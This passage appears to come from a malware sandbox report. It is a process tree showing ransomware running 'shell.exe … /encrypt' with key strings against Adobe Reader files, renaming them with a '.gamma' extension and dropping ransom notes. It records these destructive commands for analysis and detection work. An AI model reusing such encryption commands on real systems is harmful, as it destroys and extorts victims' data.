                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:3576
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 248
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                PID:796
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                  PID:6024
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:2580
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:2472
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\XDPFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:4172
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#Decrypt_Files_ReadMe#.rtf.gif"
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:2496
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:4740
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:6856
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:1136
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4972
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3924
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 248
                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                      PID:7328
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7356
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6084
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2448
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                          PID:2828
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:6412
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3244
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                              PID:4132
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 248
                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                PID:2952
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5844
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7004
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
